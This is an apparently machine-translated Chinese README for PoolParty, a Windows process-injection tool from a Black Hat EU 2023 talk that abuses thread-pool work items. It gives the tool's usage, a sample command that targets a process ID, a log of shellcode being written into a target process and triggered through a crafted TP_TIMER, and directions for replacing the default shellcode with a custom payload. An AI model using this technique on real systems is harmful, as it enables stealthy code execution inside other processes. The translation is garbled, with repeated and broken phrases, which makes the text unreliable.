.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
滥用Windows线程池的完全无法选择的过程注入技术的集合。在Black Hat Eu eu 2023标题下以标题下的简报- 注射技术- 使用Windows-thread-pools-35446'The Pool party您将永远不会忘记3:使用窗口线程池3
PoolParty变体
3:新的过程注入技术
用法
目标过程中的项目池4将tp_io工作项目插入目标过程的线程池5将tp_alpc工作项目插入目标过程的线程池6插入tp_job工作项目到目标过程的线程池7插入tp_direct tp_direct tp_direct工作项目到目标过程的线程池的线程池8插入TP_TIMER工作项目8目标PID
用法示例
插入tp_timer工作项要处理ID 1234
poolParty.exe -v 8 -p 1234
[INFO]启动PoolParty攻击进程ID: 1234
[INFO]检索到目标过程: 000000000000000000B8
[INFO]目标过程劫持工厂手柄: 0000000000000000000058
[INFO]目标过程中劫持的计时器队列句柄: 000000000000000000054
[INFO]目标进程中分配的外壳内存: 00000281DBEF0000
[信息]书面壳代码到目标过程
[信息]检索目标工厂的基本信息
[INFO]创建了与ShellCode关联的TP_TIMER结构
[信息]目标进程中分配的TP_TIMER内存: 00000281DBF00000
[INFO]将特殊精心制作的TP_Timer结构写成目标过程
[INFO]修改了目标过程的TP_POOL TIEMR队列列表条目,指向特殊精心设计的TP_Timer
[INFO]设置计时器队列到期以触发Dequeueing tpptimerqueueexp Iration
[INFO] POOLPARTY攻击成功完成了
默认的shellCode和自定义
默认的ShellCode通过Winexec API产生了计算器。
要自定义执行执行的执行,请在main.cpp文件中存在的g_shellcode变量末端更改路径。
作者 - Alon Leviev
LinkedIn -Alon Leviev Twitter- @_0xdeku